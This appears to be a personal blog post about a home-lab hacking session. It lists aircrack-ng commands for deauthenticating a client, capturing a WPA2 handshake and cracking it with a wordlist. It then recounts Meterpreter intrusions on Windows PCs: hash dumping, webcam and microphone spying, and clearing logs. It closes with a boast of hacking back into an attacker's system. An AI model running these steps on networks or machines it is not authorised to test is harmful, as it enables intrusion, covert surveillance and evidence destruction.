So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff. So I got some time to play around 🙂 on my home lab. – so here’s the thing:
It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password; post-handshake and obviously it’s only as good as your word list.
Key commands are:
airodump-ng [monitor interface]
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
Further to that, and in about as much time as it took me to read up on Meterpreter, with recognition to Offensive Security. I was able to access a couple of Windows PC’s on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and probably the most impressive and most worrying was the ability to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. Oh…. and I cleared the logs as I left the scene – all within a couple of hours.
So keep those systems secure and up to date peeps!
Thank you for the continual attempts to try and access my system at home, it’s been very annoying. Oh, and btw it took me a mere 5 mins to access yours (with the intent on finding out who you are to advise that your systems have been accessed, of course) and i should probably brush up on my South American some….
and another one……